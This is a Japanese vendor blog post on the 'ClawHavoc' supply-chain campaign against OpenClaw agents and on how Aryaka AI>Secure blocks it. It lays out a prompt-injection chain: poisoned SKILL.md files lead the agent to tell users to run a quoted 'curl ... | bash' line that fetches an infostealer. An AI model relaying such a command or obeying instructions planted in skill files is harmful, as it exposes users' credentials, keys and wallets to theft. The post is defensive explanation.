2026年2月現在、OpenClaw(旧ClawdbotおよびMoltbot)は自律型AIエージェントのための一般的なプラットフォームです。AIがファイルシステムや端末に直接アクセスできる「ソブリン」アーキテクチャは、攻撃対象領域を大幅に拡大し、潜在的な危険に何千ものデプロイメントをさらしたClawHavocサプライチェーンキャンペーンに代表されるように、リスクの増大につながります。
この記事では、OpenClawの脆弱性をレビューし、Aryaka AI>Secureがどのように強固で多層的なリスク軽減を提供するかを説明します。
OpenClawの脆弱性とClawHavocのコンテキスト
OpenClawの脆弱性は主に3つの要因によって引き起こされます:
- システムレベルのアクセス:エージェントはシェルコマンドを実行し、クレデンシャルにアクセスすることができます。
- 信頼できない取り込み:エージェントはサードパーティのコンテンツを処理し、プロンプトインジェクションにさらされます。
- 自律的なコミュニケーション:エージェントは監視なしにデータを外部に送信できます。
ClawHavocは、このエコシステムを悪用したサプライチェーン攻撃です。2026年2月、研究者はClawHubスキルの約12%が悪意のあるものであり、便利なツールに見せかけ、実際にはデジタルIDを盗んでいることを発見しました。
ClawHavocの仕組み感染の解剖学
ClawHavocはステートフルなソーシャルエンジニアリング攻撃で、OpenClawが命令を取り込む方法を悪用します。この攻撃は、繰り返し実行可能で非常に効果的なキルチェーンに従います:
- ステップ1:毒入りマニフェスト(SKILL.md):攻撃者はClawHubにスキルをアップロードします。攻撃の核となるのはSKILL.mdファイルです。このファイルには、ツールを「初期化」するために特定のスクリプトを実行する必要があることをエージェント(およびユーザー)に伝える「前提条件」セクションが含まれています。
- ステップ2:LLMによるソーシャルエンジニアリング:エージェントにスキルの使用を依頼すると、エージェントは悪意のあるSKILL.mdをコンテキストに読み込みます。そして、LLMは役に立つように聞こえる応答を生成します:”この機能を有効にするには、ターミナルで次のコマンドを実行してください: curl -sL https://glot.io/raw/snippet | bash.”。
- ステップ 3: マルウェア ペイロードの配信:ユーザーがコマンドを実行すると、第2段階のペイロード(典型的にはAtomic Stealer(AMOS)またはキーロガー)がダウンロードされます。このマルウェアは、ブラウザのクッキー、キーチェーン、OpenClaw環境ファイルからAPIキーと暗号ウォレットを盗み出します。
Aryaka AI>Secure を使ってClawHavocを阻止
ディープパケット、AIを意識したMITMプロキシとして、Aryaka AI>Secureは、ClawHavoc攻撃チェーンのすべての段階でトラフィックを遮断します。
方法1:悪意のあるスキルのダウンロードをブロックする
ユーザーがclawhub installを実行すると、AI>SecureはレジストリからHTTPSトラフィックを解読します。
- 保護:SKILL.mdのMarkdownコンテンツを解析します。セマンティック検査により、隠されたシェルコマンドやClawHavocキャンペーンで使用された既知のスニペット共有サイトへのリンクなど、「有害な指示」を識別します。
- 結果ネットワークエッジでダウンロードをブロックし、悪意のある命令がエージェントのメモリに到達するのを防ぎます。
方法2:レスポンス・セマンティック・フィルタリング(インストラクション・ディフェンス)
悪質なスキルがすでにあなたのマシンにある場合、AI>Secureは、LLMの出力を検査することで、第二の防御層を提供します。
- 保護:LLM が「このスクリプトを実行してツールを有効にする」とユーザーに指示すると、AI>Secure のセマンティック・エンジンはこれを「インストーラー詐欺」と認識します。AIが人間を騙して危険な行動を取らせていることを識別します。
- 結果プロキシはチャットストリームからコマンドを削除するか、メッセージを完全にブロックし、ユーザーのインターフェースにセキュリティ警告を表示します。
方法3:プロアクティブなURLフィルタリングとSWG(ペイロード防御)
ユーザーが悪意のある curl コマンドを手動で実行しようとしたり、「前提条件」の ZIP をダウンロードしようとすると、AI>Secure の Secure Web Gateway (SWG) 機能が介入します。
- 保護AI>Secureは、リアルタイムのURLインテリジェンス・フィードを利用して、フィッシング・ドメインとマルウェア・ホスティング・インフラストラクチャを追跡します。
- 結果エージェントやユーザがマルウェアのペイロードをホストする特定のURL(glot.ioやwebhook.siteなど)に到達しようとすると、プロキシは宛先を「悪意がある」または「リスクが高い」と識別し、リクエストを即座に停止します。これにより、実際のマルウェアがフェッチされることを防ぎます。
方法4:ランタイムツールとデータロックダウン
マルウェアが実行に成功した場合、AI>Secureがお客様のデータの最終的なゲートキーパーとして機能します。
- プロテクション:MCP(Model Context Protocol)コールを理解します。感染したエージェントがデータを流出させるためにシェルコマンドを実行しようとした場合、AI>Secureは異常な流出先を特定します。
- その結果次世代DLP(データ損失防止)は、すべての送信データをスキャンして「シークレット」(APIキー、SSHヘッダー)を探します。ネットワークから個人情報が流出した場合、セッションを終了し、セキュリティチームに警告します。
結論
ClawHavocの危機は、自律型エージェントにとって、プロンプトとスキルマニフェストが新しい境界線であることを証明しています。Aryaka AI>Secure のようなAI中心のプロキシを活用することで、OpenClawエージェントが攻撃者のゲートウェイではなく、生産性のためのツールであり続けることを保証します。